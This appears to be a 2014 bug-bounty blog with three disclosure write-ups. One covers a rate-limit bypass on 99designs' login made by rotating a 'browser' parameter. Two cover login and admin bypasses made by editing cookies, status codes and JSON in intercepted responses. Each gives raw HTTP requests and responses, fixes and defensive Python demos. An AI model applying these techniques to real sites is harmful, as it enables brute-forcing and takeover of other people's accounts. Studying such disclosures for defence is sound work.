Monday, May 19, 2014

A Way to Bypass Rate Limiting


Another Way to Bypass Rate Limiting




I want to share one of my findings on account.99designs.com, which I reported to them on 5th May 2014.









I found that the site.com login URL https://account.99designs.com/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= was vulnerable to brute-force attacks even though rate limiting was implemented for all site.com user accounts and the server was blocking the requests.





So first I tried analysing the response status code and the response length, but once we hit 60 wrong password attempts the status code was 200 for all right and wrong password attempts, and the error message was also generic for all right and wrong password attempts.





Then I tried a User-Agent based brute-force attack, changing the User-Agent header of each request to known and anonymous user-agent values, but that also failed. After further, deeper analysis I found that a parameter named browser was sent by POST in each request, whether the password was right or wrong, and that this parameter carried the name of the browser currently in use, i.e. internet+explorer. So the server was checking the User-Agent using the header and also using the browser parameter and its value internet+explorer.





So, to find a weakness in the rate limiting countermeasure, I first sent more than 60 wrong password requests using the browser parameter with the value internet+explorer. Once the 60 wrong password requests had been sent, the rate limiting was enabled and it started blocking both wrong and right password requests, sending status code 200 and the same response length for all right and wrong password attempts; the error message was also generic for all right and wrong password attempts. So again it failed.




After that I started sending each request with the browser parameter value changed to any known, or even any unknown, browser name. I then observed that after more than 60 wrong password attempts, and even after more than 10000 wrong password attempts, the rate limiting was not enabled, and the status code and response length did not change to 200 for all attempts. Instead, for the right password it was 302 and for the wrong password it was 200.



So, in this way I was able to bypass the site.com rate limiting by changing the browser parameter value in each request and by analysing the differences in status code and response length.



Original Request:



POST /sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: __iswl_account99designscom=0; sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073; sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F; __ssid=69a7009e-a365-4481-87e3-60620271c47d; CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=Internet+Explorer&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH




Modified Request:



POST /sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: __iswl_account99designscom=0; sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073; sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F; __ssid=69a7009e-a365-4481-87e3-60620271c47d; CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=test+test&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH



In this way the attacker was able to bypass the rate limiting of 99designs.





Impact:





The attacker can successfully brute-force the password of any user's account even when rate limiting is enabled, and this can lead to account compromise.








Recommendation:

The response length for right and wrong passwords shall always be the same for any user's account.



Instead of User-Agent based validation for enabling the rate limiting, the user id shall be checked for the number of wrong password attempts.





The account shall only be unlocked using an email which contains an unlock-account link.
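The weakness above comes down to what the failure counter is keyed on. The following is an added example written for this page, not code from the original post or from 99designs: a toy login endpoint whose rate limiter can be keyed either on client-supplied request fields (the User-Agent header and the browser POST parameter, as the post observed) or on the account under attack, as the recommendation asks. The account, password, request fields and the simulate() helper are constructed for the demo; the 60-attempt threshold is the one the post observed.

```python
# Added example (not from the original post or 99designs): a toy login endpoint
# with a pluggable rate-limit key, contrasting a counter keyed on fields the
# client controls with one keyed on the targeted account.
from collections import defaultdict

MAX_WRONG = 60                                      # threshold observed in the post
USERS = {"victim@example.com": "correct-horse"}     # constructed test account
GENERIC_ERROR = "Invalid username or password"


class LoginService:
    """Minimal login endpoint; key_fn decides what the failure counter is keyed on."""

    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.failures = defaultdict(int)

    def login(self, req):
        key = self.key_fn(req)
        if self.failures[key] >= MAX_WRONG:
            # Locked out: identical status and body whether or not the password
            # is right, so the lockout itself leaks nothing.
            return 200, GENERIC_ERROR
        if USERS.get(req["username"]) == req["password"]:
            self.failures[key] = 0
            return 302, "Location: /dashboard"
        self.failures[key] += 1
        return 200, GENERIC_ERROR


def client_fields_key(req):
    # Weak: every value here is chosen by the client, so a fresh "browser"
    # value on each request starts a fresh counter.
    return (req["headers"]["User-Agent"], req["browser"])


def account_key(req):
    # Hardened: the counter follows the account being targeted, which the
    # client cannot rotate without changing its target.
    return req["username"]


def simulate(service, wrong_attempts, rotate_browser):
    """Send wrong_attempts bad passwords (optionally with a new "browser" value
    each time), then try the real password and return its status code."""

    def request(password, browser):
        return {
            "username": "victim@example.com",
            "password": password,
            "browser": browser,
            "headers": {"User-Agent": "Mozilla/5.0 (compatible; MSIE 10.0)"},
        }

    for i in range(wrong_attempts):
        browser = f"browser{i}" if rotate_browser else "Internet Explorer"
        service.login(request(f"guess{i}", browser))
    # 302 means the limiter never tripped and the password check still runs.
    status, _ = service.login(request("correct-horse", "Internet Explorer"))
    return status


if __name__ == "__main__":
    print("client-fields key, rotating browser:", simulate(LoginService(client_fields_key), 100, True))
    print("account key, rotating browser:", simulate(LoginService(account_key), 100, True))
```

With the client-fields key, 100 wrong attempts that each carry a new browser value never push any single counter to 60, so the real password still returns 302 afterwards; with the account key the same 100 attempts lock the account and the real password gets the same generic 200 as a wrong one, which is exactly the uniform response the first recommendation asks for.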







The vulnerability was mitigated by 99designs Security Team.



So in this way one can bypass rate limiting and compromise the victim's account; this technique can also be used to find the same type of vulnerability on different websites.



Suggestions and feedback are welcome.


Wednesday, May 7, 2014

Authentication Bypass & Privilege Escalation Using Header Manipulation & Cookie Injection





A Way to Bypass Authentication & Gain Admin Privilege Using Login Validation Process Prediction





While researching and working on bug bounties in Feb 2013, I found a way to bypass authentication and gain admin privilege using header manipulation and cookie injection; using this vulnerability we can take over all the user accounts of a website if that site is vulnerable to this type of attack.





Using this vulnerability the attacker can predict the login validation process for any admin's account by combining various techniques, and in this way can also bypass authentication for all passwords of all the admin accounts and successfully compromise the admin accounts, since the login validation process is predictable by the attacker.



I tried various techniques to bypass the login, like arbitrary method usage, cookie manipulation, status code value modification and response code modification, but all of these techniques failed, so the challenge was to understand the login validation process and to find a weakness in it. So now I describe how I was able to bypass the admin authentication.






Please note: there was a precondition that the attacker needs to know only the admin's login email id. This can be obtained using the forgot-password function or even the login URL itself.







Steps to Execute the Attack:


For login validation process analysis I created 2 test accounts.



1. First we send the login request using our own account attackerloginid@testsite.com with a wrong password, while intercepting the response for the wrong password, using the login link mentioned below.



https://testsite.com/user/login



2. From this I found that if the password is wrong, then the server response code is 302 Found, the first Set-Cookie named remember_email has a null value, the second Set-Cookie named registration_status has the value unregistereduser, and the Location header value is the site login page URL https://testsite.com/user/login.




3. Now we send the login request using our own account attackerloginid@testsite.com with the right password, while intercepting the response for the right password, using the login link mentioned below.



https://testsite.com/user/login



4. From this I found that if the password is right, then the server response code is 302 Found, the first Set-Cookie named remember_email has the value attackerloginid@testsite.com, the second Set-Cookie named registration_status has the value registereduser, and the Location header value is the site dashboard page URL https://testsite.com/user/accounts/dashboard.



5. Now that we have found the variation between the wrong-password and right-password server responses, we know we can predict the login validation process for the right password for any victim's account and also for the admin account.



So in simple words: the attacker now tries to log into the victim's account using the login URL and the victim's user id or login email id, which is victimloginid@testsite.com, with a wrong password, while intercepting the response using any web proxy. He gets the server response code 302 Found with a first Set-Cookie named remember_email with a null value, a second Set-Cookie named registration_status with the value unregistereduser, and the Location header value set to the site user login page URL https://testsite.com/user/login.



So now the attacker sets the first Set-Cookie named remember_email to the value victimloginid@testsite.com, the second Set-Cookie named registration_status to the value registereduser, and the Location header value to the site user dashboard page URL https://testsite.com/user/accounts/dashboard, and forwards the request using any web proxy; now the attacker successfully logs into the victim's account.



Now, to bypass the admin's login authentication in the same way, the attacker sets the first Set-Cookie named remember_email to the value adminloginid@testsite.com, the second Set-Cookie named registration_status to the value registeredadmin, and the Location header value to the site admin dashboard page URL https://testsite.com/admin/accounts/dashboard, and forwards the request using any web proxy; now the attacker successfully logs into the admin's account and gains admin privilege.



So in this way we can easily bypass the admin authentication as well as a user's authentication :).




Key points: the registration_status cookie value unregistereduser is for a user with a wrong password, registereduser is for a user with the right password, and registeredadmin is for the admin user with the right password.


Attacker's Login ID: attackerloginid@testsite.com






Victim's Login ID: victimloginid@testsite.com






Admin's Login ID: adminloginid@testsite.com




Original Server Response Using Attacker's Account with Wrong Password:



HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:30:09 GMT
Location: https://testsite.com/user/login
Set-Cookie: remember_email=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=unregistereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive



Original Response Using Attacker's Account with Right Password:



HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:32:22 GMT
Location: https://testsite.com/user/accounts/dashboard
Set-Cookie: remember_email=attackerloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive





Modified response, in which the attacker changed the Set-Cookie values, the Status and the Location header value and sent it on as a request to bypass the victim's login:




HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:35:43 GMT
Location: https://testsite.com/user/accounts/dashboard
Set-Cookie: remember_email=victimloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive






Modified response, in which the attacker changed the Set-Cookie values, the Status and the Location header value and sent it on as a request to bypass the admin's login:




HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:40:14 GMT
Location: https://testsite.com/admin/accounts/dashboard
Set-Cookie: remember_email=adminloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registeredadmin; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive




Impact: 


The login validation process is predictable, and using this an attacker can easily compromise the admin's account and any other user's account on the application.







Recommendation:  


The login validation shall not depend on the combination of cookie values and Location header values, and privileges shall not be granted on the basis of cookie values. Also, it shall not depend on client-side validation; instead, proper server-side validation of the correct password shall be done.





So in this way one can take over or bypass the authentication of the admin's account, as well as any victim user's account, using admin login validation process prediction; this approach can also be used to find the same type of vulnerability on many different websites.






Suggestions and Feedbacks are welcome.


Tuesday, May 6, 2014

A Way to Bypass Authentication





Authentication Bypass Using Login Validation Process Prediction







While researching and working on bug bounties in late Dec 2012, I found a way to bypass authentication with which we can take over all the user accounts of a website if that site is vulnerable to this type of attack.





Using this vulnerability the attacker can predict the login validation process for any victim's account by combining various techniques, and in this way can also bypass authentication for all passwords of all the accounts and successfully compromise the victims' accounts, since the login validation process is predictable by the attacker.



I tried various techniques to bypass the login, like response code modification and arbitrary method usage, but all of these techniques failed, so the challenge was to understand the login validation process and to find a weakness in it. So now I describe how I was able to bypass the authentication.






Please note: there was a precondition that the attacker needs to know only the victim's login id or user id.







Steps to Execute the Attack:




For login validation process analysis I created 2 test accounts.



1. First we send the login request using our own account attackerloginid with a wrong password, while intercepting the response for the wrong password, using the login link mentioned below.



https://testsite.com/login.jsp



2. From this I found that if the password is wrong, then the server response code is 200 OK, a Set-Cookie named pstoken with a null value is generated once, and the status value in the JSON body is as follows: {"failed":false}.




3. Now we send the login request using our own account attackerloginid with the right password, while intercepting the response for the right password, using the login link mentioned below.



https://testsite.com/login.jsp



4. From this I found that if the password is right, then the server response code is 302 Found, the Set-Cookie named pstoken has the md5 hash of the attacker's user id or login id, 636559678682db9e21c958a4df44eea4, and is generated twice, and the status value in the JSON body is as follows: {"success":true}.



5. Now that we have found the variation between the wrong-password and right-password server responses, we can predict the login validation process for the right password.



So in simple words: the attacker now tries to log into the victim's account using the login URL and the victim's user id or login id, which is victimloginid, with a wrong password, while intercepting the response using any web proxy. He gets the server response code 200 OK with a Set-Cookie named pstoken with a null value, generated once, and a status value in the JSON body as follows: {"failed":false}.



So now the attacker changes the response code from 200 OK to 302 Found, adds the Set-Cookie named pstoken twice, changing its value from null to the md5 hash of the victim's user id or login id, which is e9fc2abd9060fde1a67e3367b7d64bd0, and then changes the status value from {"failed":false} to {"success":true} and forwards the request using any web proxy; now the attacker successfully logs into the victim's account.



So in this way we can easily bypass the authentication :).






Attacker's Login ID: attackerloginid, md5 hash value: 636559678682db9e21c958a4df44eea4
















Victim's Login ID: victimloginid, md5 hash value: e9fc2abd9060fde1a67e3367b7d64bd0



Original Server Response Using Attacker's Account with Wrong Password:



HTTP/1.1 200 OK
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"failed":false}





Original Response Using Attacker's Account with Right Password:



HTTP/1.1 302 Found
Date: Wed,  7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}



Modified response, in which the attacker changed the response code, the Set-Cookie headers and their values, and the status value in the JSON body, and sent it on as a request:



HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}






Impact: 


The login validation process is predictable, and using this an attacker can easily compromise any user's account on the application.







Recommendation:  

The login validation shall not depend on the combination of response code values, cookie values, JSON status values and the like. Also, it shall not depend on client-side validation; instead, proper server-side validation of the correct password shall be done.
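The root cause in this post is that the session cookie was a pure function of public information: pstoken was the md5 of the login id, so the value the server would accept for any account could be computed without ever passing the password check, and editing the response in a proxy was enough to make the client present it. The following is an added example written for this page, not code from the original post or from the site it describes. It contrasts that scheme with a server that issues a random pstoken and records it server-side only after verifying the password, so that nothing the client does to the response body or cookies creates a session. The user table, passwords, JSON bodies and the ISSUED store are constructed for the demo; the md5 values are computed here, not taken from the post.

```python
# Added example (not from the original post): a session token derived from the
# login id (md5, as observed in the post) versus a random token issued and
# recorded server-side after password verification.
import hashlib
import hmac
import secrets

# Constructed user table: login id -> password (plaintext only for brevity).
USERS = {"attackerloginid": "attacker-pass", "victimloginid": "victim-pass"}


# --- Weak scheme: the token is a deterministic function of the login id
def weak_token(login_id):
    """pstoken = md5(login id): anyone who knows the id can compute it."""
    return hashlib.md5(login_id.encode()).hexdigest()


def weak_resolve(pstoken):
    """Server-side lookup that accepts any pstoken equal to md5(id) of a known id,
    regardless of whether that user ever authenticated."""
    for login_id in USERS:
        if hmac.compare_digest(weak_token(login_id).encode(), pstoken.encode()):
            return login_id
    return None


# --- Hardened scheme: the token is random and exists only after verification
ISSUED = {}  # pstoken -> login id; populated by the server alone


def hardened_login(login_id, password):
    """Returns (json body, pstoken). The token is None unless the password verified,
    so a client that rewrites the body to success still holds no valid token."""
    expected = USERS.get(login_id)
    if expected is None or not hmac.compare_digest(expected.encode(), password.encode()):
        return '{"success":false}', None
    token = secrets.token_hex(16)   # 128 random bits, unrelated to the login id
    ISSUED[token] = login_id
    return '{"success":true}', token


def hardened_resolve(pstoken):
    """Only tokens the server issued map to a user; md5(id) or any guess does not."""
    return ISSUED.get(pstoken)


if __name__ == "__main__":
    guess = weak_token("victimloginid")
    print("weak scheme, token computed from the id alone:", weak_resolve(guess))
    print("hardened scheme, same token:", hardened_resolve(guess))
    body, token = hardened_login("victimloginid", "victim-pass")
    print("hardened scheme after real login:", body, hardened_resolve(token))
```

In the weak scheme weak_resolve(weak_token("victimloginid")) returns the victim without any password ever being checked; in the hardened scheme the same value resolves to nothing, and the only tokens that resolve are those hardened_login() created after a successful comparison. The constant-time compare_digest calls avoid turning the lookup itself into a timing side channel.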





So in this way one can take over or bypass the authentication of any victim's account using login validation process prediction; this approach can also be used to find the same type of vulnerability on many different websites.






Suggestions and Feedbacks are welcome.